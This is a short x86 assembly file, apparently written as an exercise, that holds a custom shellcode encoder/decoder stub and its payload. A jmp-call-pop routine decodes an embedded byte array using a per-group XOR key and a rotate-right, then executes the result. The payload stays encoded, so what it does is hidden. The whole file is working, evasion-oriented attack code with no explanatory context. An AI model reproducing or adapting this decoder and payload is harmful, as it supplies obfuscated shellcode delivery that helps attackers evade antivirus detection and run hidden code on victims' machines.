bits 32

%define RORVAL  0x4
%define GROUPSZ 0x4

global _start

_start:
    pushad
    jmp shellcode

decode:    
    pop esi
    push esi
    mov edi, esi
    xor ecx, ecx
    
    .decodeloop:   
        mov cl, GROUPSZ
        mov byte al, [esi]
        cmp al, 0xff
        je .done
        inc esi
    
        .decodegroup:
            mov dl, [esi]
            cmp dl, 0xff
            je .done
            ror dl, RORVAL
            xor dl, al
            mov byte [edi], dl
            inc esi
            inc edi
            dec ecx
            jz .decodeloop
            jmp .decodegroup
    
    .done:
        pop eax
        call eax
        popad
        ret
    
shellcode:
    call decode
    db 0x0e,0xf3,0xec,0xe5,0xe5,0xe3,0x3b,0x7e,0x5e,0x3b,0x26,0xa0,0x32,0x67,0x66,0x85,0x5d,0xd3,0xce,0x20,0xa5,0xe0,0x4d,0xa5,0x57,0x23,0xaa,0x4e,0x21,0x3e,0x20,0x07,0x07,0x07,0x07,0x0b,0x28,0xde,0xf0,0x90,0xf1,0x79,0x87,0x7f,0x79,0x68,0xfa,0xe2,0xa6,0x10,0xd7,0xeb,0x01,0x19,0x3d,0xb1,0xd1,0x1a,0x1b,0x8d,0x34,0x48,0x42,0x46,0x26,0xfa,0xda,0x24,0x09,0xab,0x5c,0x7f,0xd2,0x3a,0xc8,0x94,0x5a,0x45,0x71,0x87,0x1c,0x84,0x59,0xaf,0xa4,0xb1,0x23,0x77,0x1a,0x77,0x3b,0xd3,0xf7,0xb7,0xaf,0x9d,0xd7,0x59,0x41,0xbd,0x86,0xaa,0xf0,0x8f,0xeb,0x80,0x90,0xef,0xcb,0x90,0x97,0x9e,0x7d,0x1c,0xc7,0x87,0x99,0xcd,0x6b,0x74,0x23,0x37,0x37,0x37,0x36,0x0e,0xe5,0x64,0xe5,0xe5,0x26,0x57,0x57,0xe9,0x14,0xb9,0xa9,0x93,0x5c,0x64,0xfb,0xb2,0xac,0xb3,0xba,0xbd,0x50,0x41,0x17,0xd3,0xab,0x7d,0x45,0xb7,0x34,0x18,0x5c,0x7e,0x7e,0x7e,0x4f,0xc2,0x57,0x31,0x83,0xb5,0xcd,0xbd,0x1d,0xad,0xc1,0x6b,0x2b,0xd9,0x2b,0xb2,0xbc,0x1c,0x6c,0x7d,0x78,0x51,0xb4,0xa4,0x42,0x2f,0xc4,0x24,0xb4,0x10,0xa8,0xdc,0x0d,0xdc,0x8a,0xff